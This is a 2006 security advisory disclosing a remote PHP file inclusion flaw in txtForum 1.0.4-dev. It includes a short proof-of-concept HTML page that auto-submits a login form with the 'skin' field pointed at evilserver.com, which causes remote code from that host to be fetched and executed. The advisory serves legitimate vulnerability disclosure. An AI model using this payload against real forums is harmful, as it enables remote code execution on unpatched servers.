txtForum (http://sourceforge.net/projects/txtforum1)
Versions 1.0.4-dev and prior.
There is an include statement in the file common.php on line 46 that makes use of the SKIN constant, which
was previously defined via the $skin variable. Under the following conditions, an attacker can inject
arbitrary PHP script into the application:
All the attacker has to do is find a path through the program that doesn't initialize the $skin variable.
The attacker does not require access to an account in the forum. Here is an example for an attack page:
<form action='http://localhost/txtforum104/login.php' method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://evilserver.com"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
This leads to execution of the code in http://evilserver.com/header.tpl. There might be further
possibilities for exploits (similar include statements can also be found on lines 53 and 61).
There is no solution to this issue yet.
Timeline:
March 2, 2006:
Vulnerability reported to and acknowledged by the developer (I.Konforti).
A fix is not planned.
March 9, 2006:
Advisory submission.
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-004.txt
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at